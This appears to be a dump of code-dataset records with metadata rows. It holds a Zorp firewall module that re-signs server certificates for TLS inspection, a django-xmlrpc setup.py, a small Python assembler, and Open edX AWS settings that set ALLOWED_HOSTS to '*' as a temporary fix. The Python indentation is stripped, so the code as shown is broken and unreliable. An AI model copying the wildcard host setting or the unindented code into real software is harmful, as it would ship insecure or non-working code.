if trusted_ca_files:
(trusted_cert_file, trusted_key_file, trusted_passphrase) = trusted_ca_files
try:
passphrase = trusted_passphrase
except IndexError:
passphrase = ""
trusted_ca_pems = (self.readPEM(trusted_cert_file), self.readPEM(trusted_key_file), passphrase)
if untrusted_ca_files:
(untrusted_cert_file, untrusted_key_file, untrusted_passphrase) = untrusted_ca_files
try:
passphrase = untrusted_passphrase
except IndexError:
passphrase = ""
untrusted_ca_pems = (self.readPEM(untrusted_cert_file), self.readPEM(untrusted_key_file), passphrase)
self._new_init(key_pem, cache_directory, trusted_ca_pems, untrusted_ca_pems, key_passphrase, extension_whitelist)
def _new_init(self, key_pem, cache_directory=None, trusted_ca_files=None, untrusted_ca_files=None, key_passphrase = "", extension_whitelist=None):
"""
<method internal="yes"/>
"""
if cache_directory:
self.cache_directory = cache_directory
else:
self.cache_directory = "/var/lib/zorp/keybridge-cache"
if not extension_whitelist:
extension_whitelist = self.default_extension_whitelist
self.extension_whitelist = extension_whitelist
self.initialized = 0
try:
self._load_privatekey(key_pem, trusted_ca_files, untrusted_ca_files, key_passphrase)
self.initialized = 1
except IOError, e:
log(None, CORE_ERROR, 3, "Error opening key or certificate file for keybridge; file='%s', error='%s'", (e.filename, e.strerror))
def _load_privatekey(self, key_pem, trusted_ca_files, untrusted_ca_files, key_passphrase):
"""<method internal="yes">
</method>"""
if not trusted_ca_files:
trusted_ca_files = (None, None, None)
(trusted_cert_file, trusted_key_file, trusted_passphrase) = trusted_ca_files
self.key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_pem, key_passphrase)
self.key_pem = key_pem
try:
passphrase = trusted_passphrase
except IndexError:
passphrase = ""
self.trusted_ca = (OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, trusted_cert_file),
OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, trusted_key_file, passphrase))
self.trusted_ca_pem = trusted_cert_file
self.untrusted_ca_pem = ""
if untrusted_ca_files:
(untrusted_cert_file, untrusted_key_file, untrusted_passphrase) = untrusted_ca_files
try:
passphrase = untrusted_passphrase
except IndexError:
passphrase = ""
self.untrusted_ca = (OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, untrusted_cert_file),
OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, untrusted_key_file, passphrase))
self.untrusted_ca_pem = untrusted_cert_file
def readPEM(self, filename):
"""<method internal="yes">
</method>
"""
log(None, CORE_DEBUG, 6, "Reading PEM file; filename='%s'" % filename)
f = open(filename, 'r')
res = f.read()
f.close()
return res
def getCachedKey(self, session_id, cert_file, cert_server):
"""<method internal="yes">
</method>"""
def is_md5(cert):
return cert.get_signature_algorithm().lower().find("md5") != -1
log(session_id, CORE_DEBUG, 5, "Loading cached certificate; file='%s'", cert_file)
try:
orig_cert = open(cert_file + '.orig', 'r').read()
except IOError, e:
log(session_id, CORE_DEBUG, 5, "Original keybridged certificate cannot be read, regenerating; file='%s', error='%s'", (cert_file, e.strerror))
raise KeyError('not in cache')
try:
cached_cert = open(cert_file, 'r').read()
cached_cert_x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cached_cert)
except IOError, e:
log(session_id, CORE_DEBUG, 5, "Cached certificate cannot be read, regenerating; file='%s', error='%s'", (cert_file, e.strerror))
raise KeyError('not in cache')
except OpenSSL.crypto.Error:
log(session_id, CORE_DEBUG, 5, "Cached certificate is not valid, regenerating; file='%s'", cert_file)
raise KeyError('not in cache')
cert_server_x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_server)
# Originally we signed every cert using md5, regardless of the server cert's algo.
# We regenerate every cert if the cached version uses md5 while the server cert uses a different algo.
if orig_cert == cert_server:
if is_md5(cached_cert_x509) and not is_md5(cert_server_x509):
log(session_id, CORE_DEBUG, 5, "Cached certificate is MD5 signed while server's certificate is not, regenerating; file='%s', cached_algo='%s', server_algo='%s'", (cert_file, cached_cert_x509.get_signature_algorithm(), cert_server_x509.get_signature_algorithm()))
else:
log(session_id, CORE_DEBUG, 5, "Cached certificate ok, reusing; file='%s'", cert_file)
return (cached_cert, OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, self.key))
else:
log(session_id, CORE_DEBUG, 5, "Cached certificate changed, regenerating; file='%s'", cert_file)
raise KeyError, 'certificate changed'
def storeCachedKey(self, session_id, cert_file, new_blob, orig_blob):
"""<method internal="yes">
</method>"""
try:
try:
os.unlink(cert_file)
except OSError:
pass
try:
os.unlink(cert_file + '.orig')
except OSError:
pass
log(session_id, CORE_DEBUG, 5, "Storing cached certificate; file='%s'", cert_file)
f = open(cert_file, 'w')
f.write(new_blob)
f.close()
f = open(cert_file + '.orig', 'w')
f.write(orig_blob)
f.close()
except IOError, e:
log(session_id, CORE_ERROR, 2, "Error storing generated X.509 certificate in the cache; file='%s', error='%s'", (cert_file, e.strerror))
def getLastSerial(self):
"""<method internal="yes">
</method>"""
serial = 1
for file in os.listdir(self.cache_directory):
if file[-4:] != '.crt':
continue
f = open("%s/%s" % (self.cache_directory, file), 'r')
data = f.read()
f.close()
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, data)
cser = cert.get_serial_number()
if cser > serial:
serial = cser
return serial
def genCert(self, key, orig_cert, ca_cert, ca_key, serial):
"""<method internal="yes">
</method>"""
filetype = OpenSSL.crypto.FILETYPE_PEM
certificate = OpenSSL.crypto.dump_certificate(filetype, orig_cert)
if self.extension_whitelist:
# delete extensions not on whitelist
zorp_certificate = ZorpCertificate(certificate)
certificate = zorp_certificate.handle_extensions(self.extension_whitelist)
new_cert = OpenSSL.crypto.load_certificate(filetype, certificate)
new_cert.set_serial_number(serial)
new_cert.set_issuer(ca_cert.get_subject())
new_cert.set_pubkey(key)
hash_alg = orig_cert.get_signature_algorithm()
try:
new_cert.sign(ca_key, hash_alg)
except ValueError, e:
log(None, CORE_INFO, 3, "Could not sign cert with hash algorithm, falling back to SHA256; hash_alg='%s'", hash_alg)
new_cert.sign(ca_key, 'sha256')
return new_cert
def _save_new_cert(self, session_id, orig_blob, ca_pair, cert_file, serial):
"""<method internal="yes">
</method>"""
orig_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, orig_blob)
new_cert = self.genCert(self.key, orig_cert, ca_pair[0], ca_pair[1], serial)
new_blob = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, new_cert)
self.storeCachedKey(session_id, cert_file, new_blob, orig_blob)
return new_blob
def _dump_privatekey(self):
"""<method internal="yes">
</method>"""
return OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, self.key)
def _get_serial_filename(self):
"""<method internal="yes">
</method>"""
return '%s/serial.txt' % self.cache_directory
def getKeypair(self, session_id, selector):
"""<method internal="yes">
</method>"""
if not self.initialized:
log(session_id, CORE_ERROR, 3, "Keybridge not completely initialized, error generating keypair;")
return (None, None)
try:
trusted = 1
orig_blob = selector['bridge-trusted-key']
hash_key = orig_blob + self.trusted_ca_pem + self.key_pem
except KeyError:
trusted = 0
orig_blob = selector['bridge-untrusted-key']
hash_key = orig_blob + self.untrusted_ca_pem + self.key_pem
hash = hashlib.sha256(hash_key).hexdigest()
if trusted:
cert_file = '%s/trusted-%s.crt' % (self.cache_directory, hash)
ca_pair = self.trusted_ca
else:
cert_file = '%s/untrusted-%s.crt' % (self.cache_directory, hash)
ca_pair = self.untrusted_ca
with FileLock("%s/.lock" % self.cache_directory):
try:
return self.getCachedKey(session_id, cert_file, orig_blob)
except KeyError:
log(session_id, CORE_DEBUG, 5, "Certificate not found in the cache, regenerating;")
serial_file = self._get_serial_filename()
serial_pos = ""
try:
serial_pos = "file open"
serial_file_fd = open(serial_file, 'r')
serial_pos = "file read"
serial_file_data = serial_file_fd.read().strip()
serial_pos = "turn to integer"
serial = int(serial_file_data)
serial_pos = None
except (ValueError, IOError):
serial = self.getLastSerial()
log(session_id, CORE_ERROR, 3, "On-line CA serial file not found, reinitializing; file='%s', serial='%d', pos='%s'", (serial_file, serial, serial_pos))
serial = serial + 1
try:
with open(serial_file, 'w') as f:
f.write(str(serial))
except IOError, e:
log(session_id, CORE_ERROR, 2, "Cannot write serial number of on-line CA; file='%s', error='%s'", (serial_file, e.strerror))
new_blob = self._save_new_cert(session_id, orig_blob, ca_pair, cert_file, serial)
return (new_blob, self._dump_privatekey())
|
gpl-2.0
| -1,043,015,836,164,202,400 | 43.309771 | 771 | 0.592643 | false |
Fantomas42/django-xmlrpc
|
setup.py
|
1
|
1097
|
import os
from setuptools import find_packages
from setuptools import setup
import django_xmlrpc
setup(name='django-xmlrpc',
version=django_xmlrpc.__version__,
description='XML-RPC Server App for the Django framework.',
long_description=open(os.path.join('README.rst')).read(),
keywords='django, service, xmlrpc',
author='Graham Binns',
author_email='graham.binns@gmail.com',
maintainer='Fantomas42',
maintainer_email='fantomas42@gmail.com',
url='https://github.com/Fantomas42/django-xmlrpc',
packages=find_packages(),
classifiers=[
'Framework :: Django',
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules'],
license='New BSD License',
include_package_data=True,
zip_safe=False
)
|
bsd-3-clause
| 3,275,820,287,542,912,000 | 29.472222 | 74 | 0.633546 | false |
KB777/1541UltimateII
|
tools/parse_nano.py
|
1
|
6839
|
import sys
import logging
console = logging.StreamHandler()
logger = logging.getLogger()
logger.addHandler(console)
logger.setLevel(logging.ERROR)
labels = {}
program = []
imm_expr = []
imm_dict = {}
imm_values = []
nr = 0
def _get_value_imm(str):
if str[0] == '#':
if phase == 1:
if not str[1:] in imm_expr: # phase 1
imm_expr.append(str[1:])
return 0
else: # phase == 2
return imm_dict[_get_value(str[1:])] # phase 2
# not an immediate value
return _get_value(str)
def _get_value(str):
if str[0] == '#':
raise ValueError('Not allowed to use immediate value. Line %d' % nr)
if str[0] == '$':
val = int(str[1:], 16)
elif str[0:2] == '0x':
val = int(str[2:], 16)
else:
try:
val = int(str)
except ValueError:
try:
val = labels[str]
except KeyError:
if phase == 2:
raise NameError('Unknown indentifier ' + str)
val = 0
return val & 0xFFFF
def _output_direct(data):
global pc
pc += 1
if phase == 2:
program.append("%04X" % data)
def add_label(line):
logger.debug("add label '%s'. Pass %d. PC = %d" % (line, phase, pc))
split = line.split('=')
for i in range(len(split)):
split[i] = split[i].strip()
if (phase == 1) and (split[0] in labels):
raise NameError("Label '%s' already exists." % split[0])
if len(split) > 1:
labels[split[0]] = _get_value(split[1])
else:
labels[split[0]] = pc
##########################################################################
##
## PARSE rules for each opcode
##
##########################################################################
def _addr(params, mnem, code):
addr = _get_value(params)
if addr > 0x3FF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _addr_imm(params, mnem, code):
addr = _get_value_imm(params)
if addr > 0x3FF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _data(params, mnem, code):
data = _get_value(params)
logger.info("PC: %03x: %s $%04x" % (pc, mnem, data))
_output_direct(data)
return data
def _block(params, mnem, code):
length = _get_value(params)
logger.info("PC: %03x: %s $%04x" % (pc, mnem, length))
for i in range(length):
_output_direct(0)
return 0
def _addr_io(params, mnem, code):
addr = _get_value(params)
if addr > 0xFF:
print "Error, address too large: %03x: %s $%03x" % (pc, mnem, addr)
exit()
code |= addr
logger.info("PC: %03x: %04x | %s $%03x" % (pc, code, mnem, addr))
_output_direct(code)
return code
def _no_addr(params, mnem, code):
logger.info("PC: %03x: %04x | %s" % (pc, code, mnem))
_output_direct(code)
return code
def unknown_mnem(params):
print "Unknown mnemonic: '%s'" % params
def dump_bram_init():
bram = [0]*2048
for i in range(len(program)):
inst = int(program[i], 16)
bram[2*i+0] = inst & 0xFF
bram[2*i+1] = (inst >> 8) & 0xFF
for i in range(64):
if (i*16) >= len(program):
break
hx = ''
for j in range(31,-1,-1):
hx = hx + "%02X" % bram[i*32+j]
print " INIT_%02X => X\"%s\"," % (i, hx)
def dump_nan_file(filename):
f = open(filename, "wb")
for i in range(len(program)):
inst = int(program[i], 16)
b1 = inst & 0xFF
b0 = (inst >> 8) & 0xFF
f.write("%c%c" % (b0, b1))
f.close()
mnemonics = {
'LOAD' : ( _addr_imm, 0x0800 ),
'STORE' : ( _addr, 0x8000 ),
'LOADI' : ( _addr, 0x8800 ),
'STORI' : ( _addr, 0x9000 ),
'OR' : ( _addr_imm, 0x1800 ),
'AND' : ( _addr_imm, 0x2800 ),
'XOR' : ( _addr_imm, 0x3800 ),
'ADD' : ( _addr_imm, 0x4800 ),
'SUB' : ( _addr_imm, 0x5800 ),
'CMP' : ( _addr_imm, 0x5000 ),
'ADDC' : ( _addr_imm, 0x6800 ),
'INP' : ( _addr_io, 0x7800 ),
'OUTP' : ( _addr_io, 0xA000 ),
'RET' : ( _no_addr, 0xB800 ),
'BEQ' : ( _addr, 0xC000 ),
'BNE' : ( _addr, 0xC800 ),
'BMI' : ( _addr, 0xD000 ),
'BPL' : ( _addr, 0xD800 ),
'BRA' : ( _addr, 0XE000 ),
'CALL' : ( _addr, 0xE800 ),
'BCS' : ( _addr, 0xF000 ),
'BCC' : ( _addr, 0xF800 ),
'.dw' : ( _data, 0x0000 ),
'.blk' : ( _block, 0x0000 )
}
def parse_lines(lines):
global nr
nr = 0
for line in lines:
nr = nr + 1
line = line.rstrip()
comm = line.split(';', 1)
line = comm[0]
if(line.strip() == ''):
continue
line_strip = line.strip()
if line[0] != ' ':
add_label(line.rstrip())
if (phase == 2):
print " ", line
continue
#print "Line: '%s'" % line_strip
line_split = line_strip.split(" ", 1)
if len(line_split) == 1:
line_split.append("")
mnem = line_split[0];
try:
(f, code) = mnemonics[mnem]
except KeyError,e:
raise NameError("Unknown Mnemonic %s in line %d" % (mnem, nr))
try:
code = f(line_split[1].strip(), mnem, code)
except IndexError,e:
raise ValueError("Value error in line %d" % (nr,))
if (phase == 2):
print "%03X: %04X | " % (pc-1, code),line
def resolve_immediates():
global pc
for imm in imm_expr:
imm_dict[_get_value(imm)] = 0;
for imm in imm_dict:
imm_dict[imm] = pc
imm_values.append(imm)
pc += 1
#print imm_expr
#print imm_dict
#print imm_values
if __name__ == "__main__":
inputfile = 'nano_code.nan'
outputfile = 'nano_code.b'
if len(sys.argv)>1:
inputfile = sys.argv[1]
if len(sys.argv)>2:
outputfile = sys.argv[2]
f = open(inputfile, 'r')
lines = f.readlines()
pc = 0
phase = 1
logger.info("Pass 1...")
parse_lines(lines)
# print labels
resolve_immediates()
pc = 0
phase = 2
logger.info("Pass 2...")
logger.setLevel(logging.WARN)
parse_lines(lines)
for imm in imm_values:
logger.info("PC: %03x: .dw $%04x" % (pc, imm))
_output_direct(imm)
dump_bram_init()
dump_nan_file(outputfile)
|
gpl-3.0
| 1,242,725,368,680,759,300 | 26.356 | 76 | 0.481942 | false |
hamzehd/edx-platform
|
cms/envs/aws.py
|
1
|
14975
|
"""
This is the default template for our main set of AWS servers.
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
import json
from .common import *
from openedx.core.lib.logsettings import get_logger_config
import os
from path import Path as path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# SERVICE_VARIANT specifies name of the variant used, which decides what JSON
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the JSON configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the JSON configuration files,
# based on the service variant. If no variant is use, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
############### ALWAYS THE SAME ################################
DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
# IMPORTANT: With this enabled, the server must always be behind a proxy that
# strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise,
# a user can fool our server into thinking it was an https connection.
# See
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
# for other warnings.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
###################################### CELERY ################################
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'djcelery.backends.cache:CacheBackend'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {}
}
############# NON-SECURE ENV CONFIG ##############################
# Things like server locations, ports, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.json") as env_file:
ENV_TOKENS = json.load(env_file)
# STATIC_URL_BASE specifies the base url to use for static files
STATIC_URL_BASE = ENV_TOKENS.get('STATIC_URL_BASE', None)
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
STATIC_URL += EDX_PLATFORM_REVISION + "/"
# GITHUB_REPO_ROOT is the base directory
# for course data
GITHUB_REPO_ROOT = ENV_TOKENS.get('GITHUB_REPO_ROOT', GITHUB_REPO_ROOT)
# STATIC_ROOT specifies the directory where static files are
# collected
STATIC_ROOT_BASE = ENV_TOKENS.get('STATIC_ROOT_BASE', None)
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE) / EDX_PLATFORM_REVISION
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
EMAIL_FILE_PATH = ENV_TOKENS.get('EMAIL_FILE_PATH', None)
EMAIL_HOST = ENV_TOKENS.get('EMAIL_HOST', EMAIL_HOST)
EMAIL_PORT = ENV_TOKENS.get('EMAIL_PORT', EMAIL_PORT)
EMAIL_USE_TLS = ENV_TOKENS.get('EMAIL_USE_TLS', EMAIL_USE_TLS)
LMS_BASE = ENV_TOKENS.get('LMS_BASE')
# Note that FEATURES['PREVIEW_LMS_BASE'] gets read in from the environment file.
SITE_NAME = ENV_TOKENS['SITE_NAME']
ALLOWED_HOSTS = [
# TODO: bbeggs remove this before prod, temp fix to get load testing running
"*",
ENV_TOKENS.get('CMS_BASE')
]
LOG_DIR = ENV_TOKENS['LOG_DIR']
CACHES = ENV_TOKENS['CACHES']
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
SESSION_COOKIE_DOMAIN = ENV_TOKENS.get('SESSION_COOKIE_DOMAIN')
SESSION_COOKIE_HTTPONLY = ENV_TOKENS.get('SESSION_COOKIE_HTTPONLY', True)
SESSION_ENGINE = ENV_TOKENS.get('SESSION_ENGINE', SESSION_ENGINE)
SESSION_COOKIE_SECURE = ENV_TOKENS.get('SESSION_COOKIE_SECURE', SESSION_COOKIE_SECURE)
SESSION_SAVE_EVERY_REQUEST = ENV_TOKENS.get('SESSION_SAVE_EVERY_REQUEST', SESSION_SAVE_EVERY_REQUEST)
# social sharing settings
SOCIAL_SHARING_SETTINGS = ENV_TOKENS.get('SOCIAL_SHARING_SETTINGS', SOCIAL_SHARING_SETTINGS)
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if ENV_TOKENS.get('SESSION_COOKIE_NAME', None):
# NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(ENV_TOKENS.get('SESSION_COOKIE_NAME'))
# Set the names of cookies shared with the marketing site
# These have the same cookie domain as the session, which in production
# usually includes subdomains.
EDXMKTG_LOGGED_IN_COOKIE_NAME = ENV_TOKENS.get('EDXMKTG_LOGGED_IN_COOKIE_NAME', EDXMKTG_LOGGED_IN_COOKIE_NAME)
EDXMKTG_USER_INFO_COOKIE_NAME = ENV_TOKENS.get('EDXMKTG_USER_INFO_COOKIE_NAME', EDXMKTG_USER_INFO_COOKIE_NAME)
#Email overrides
DEFAULT_FROM_EMAIL = ENV_TOKENS.get('DEFAULT_FROM_EMAIL', DEFAULT_FROM_EMAIL)
DEFAULT_FEEDBACK_EMAIL = ENV_TOKENS.get('DEFAULT_FEEDBACK_EMAIL', DEFAULT_FEEDBACK_EMAIL)
ADMINS = ENV_TOKENS.get('ADMINS', ADMINS)
SERVER_EMAIL = ENV_TOKENS.get('SERVER_EMAIL', SERVER_EMAIL)
MKTG_URLS = ENV_TOKENS.get('MKTG_URLS', MKTG_URLS)
TECH_SUPPORT_EMAIL = ENV_TOKENS.get('TECH_SUPPORT_EMAIL', TECH_SUPPORT_EMAIL)
COURSES_WITH_UNSAFE_CODE = ENV_TOKENS.get("COURSES_WITH_UNSAFE_CODE", [])
ASSET_IGNORE_REGEX = ENV_TOKENS.get('ASSET_IGNORE_REGEX', ASSET_IGNORE_REGEX)
# Theme overrides
THEME_NAME = ENV_TOKENS.get('THEME_NAME', None)
#Timezone overrides
TIME_ZONE = ENV_TOKENS.get('TIME_ZONE', TIME_ZONE)
# Push to LMS overrides
GIT_REPO_EXPORT_DIR = ENV_TOKENS.get('GIT_REPO_EXPORT_DIR', '/edx/var/edxapp/export_course_repos')
# Translation overrides
LANGUAGES = ENV_TOKENS.get('LANGUAGES', LANGUAGES)
LANGUAGE_CODE = ENV_TOKENS.get('LANGUAGE_CODE', LANGUAGE_CODE)
USE_I18N = ENV_TOKENS.get('USE_I18N', USE_I18N)
ENV_FEATURES = ENV_TOKENS.get('FEATURES', {})
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
# Additional installed apps
for app in ENV_TOKENS.get('ADDL_INSTALLED_APPS', []):
INSTALLED_APPS += (app,)
WIKI_ENABLED = ENV_TOKENS.get('WIKI_ENABLED', WIKI_ENABLED)
LOGGING = get_logger_config(LOG_DIR,
logging_env=ENV_TOKENS['LOGGING_ENV'],
debug=False,
service_variant=SERVICE_VARIANT)
#theming start:
PLATFORM_NAME = ENV_TOKENS.get('PLATFORM_NAME', 'edX')
STUDIO_NAME = ENV_TOKENS.get('STUDIO_NAME', 'edX Studio')
STUDIO_SHORT_NAME = ENV_TOKENS.get('STUDIO_SHORT_NAME', 'Studio')
# Event Tracking
if "TRACKING_IGNORE_URL_PATTERNS" in ENV_TOKENS:
TRACKING_IGNORE_URL_PATTERNS = ENV_TOKENS.get("TRACKING_IGNORE_URL_PATTERNS")
# Django CAS external authentication settings
CAS_EXTRA_LOGIN_PARAMS = ENV_TOKENS.get("CAS_EXTRA_LOGIN_PARAMS", None)
if FEATURES.get('AUTH_USE_CAS'):
CAS_SERVER_URL = ENV_TOKENS.get("CAS_SERVER_URL", None)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
CAS_ATTRIBUTE_CALLBACK = ENV_TOKENS.get('CAS_ATTRIBUTE_CALLBACK', None)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
################ SECURE AUTH ITEMS ###############################
# Secret things: passwords, access keys, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.json") as auth_file:
AUTH_TOKENS = json.load(auth_file)
############### XBlock filesystem field config ##########
if 'DJFS' in AUTH_TOKENS and AUTH_TOKENS['DJFS'] is not None:
DJFS = AUTH_TOKENS['DJFS']
if 'url_root' in DJFS:
DJFS['url_root'] = DJFS['url_root'].format(platform_revision=EDX_PLATFORM_REVISION)
EMAIL_HOST_USER = AUTH_TOKENS.get('EMAIL_HOST_USER', EMAIL_HOST_USER)
EMAIL_HOST_PASSWORD = AUTH_TOKENS.get('EMAIL_HOST_PASSWORD', EMAIL_HOST_PASSWORD)
# Note that this is the Studio key for Segment. There is a separate key for the LMS.
CMS_SEGMENT_KEY = AUTH_TOKENS.get('SEGMENT_KEY')
SECRET_KEY = AUTH_TOKENS['SECRET_KEY']
AWS_ACCESS_KEY_ID = AUTH_TOKENS["AWS_ACCESS_KEY_ID"]
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS["AWS_SECRET_ACCESS_KEY"]
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
if AUTH_TOKENS.get('DEFAULT_FILE_STORAGE'):
DEFAULT_FILE_STORAGE = AUTH_TOKENS.get('DEFAULT_FILE_STORAGE')
elif AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY:
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
else:
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
DATABASES = AUTH_TOKENS['DATABASES']
# Enable automatic transaction management on all databases
# https://docs.djangoproject.com/en/1.8/topics/db/transactions/#tying-transactions-to-http-requests
# This needs to be true for all databases
for database_name in DATABASES:
DATABASES[database_name]['ATOMIC_REQUESTS'] = True
MODULESTORE = convert_module_store_setting_if_needed(AUTH_TOKENS.get('MODULESTORE', MODULESTORE))
CONTENTSTORE = AUTH_TOKENS['CONTENTSTORE']
DOC_STORE_CONFIG = AUTH_TOKENS['DOC_STORE_CONFIG']
# Datadog for events!
DATADOG = AUTH_TOKENS.get("DATADOG", {})
DATADOG.update(ENV_TOKENS.get("DATADOG", {}))
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
# Celery Broker
CELERY_ALWAYS_EAGER = ENV_TOKENS.get("CELERY_ALWAYS_EAGER", False)
CELERY_BROKER_TRANSPORT = ENV_TOKENS.get("CELERY_BROKER_TRANSPORT", "")
CELERY_BROKER_HOSTNAME = ENV_TOKENS.get("CELERY_BROKER_HOSTNAME", "")
CELERY_BROKER_VHOST = ENV_TOKENS.get("CELERY_BROKER_VHOST", "")
CELERY_BROKER_USER = AUTH_TOKENS.get("CELERY_BROKER_USER", "")
CELERY_BROKER_PASSWORD = AUTH_TOKENS.get("CELERY_BROKER_PASSWORD", "")
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
# Event tracking
TRACKING_BACKENDS.update(AUTH_TOKENS.get("TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS['tracking_logs']['OPTIONS']['backends'].update(AUTH_TOKENS.get("EVENT_TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS['segmentio']['OPTIONS']['processors'][0]['OPTIONS']['whitelist'].extend(
AUTH_TOKENS.get("EVENT_TRACKING_SEGMENTIO_EMIT_WHITELIST", []))
SUBDOMAIN_BRANDING = ENV_TOKENS.get('SUBDOMAIN_BRANDING', {})
VIRTUAL_UNIVERSITIES = ENV_TOKENS.get('VIRTUAL_UNIVERSITIES', [])
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", 5)
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", 15 * 60)
MICROSITE_CONFIGURATION = ENV_TOKENS.get('MICROSITE_CONFIGURATION', {})
MICROSITE_ROOT_DIR = path(ENV_TOKENS.get('MICROSITE_ROOT_DIR', ''))
#### PASSWORD POLICY SETTINGS #####
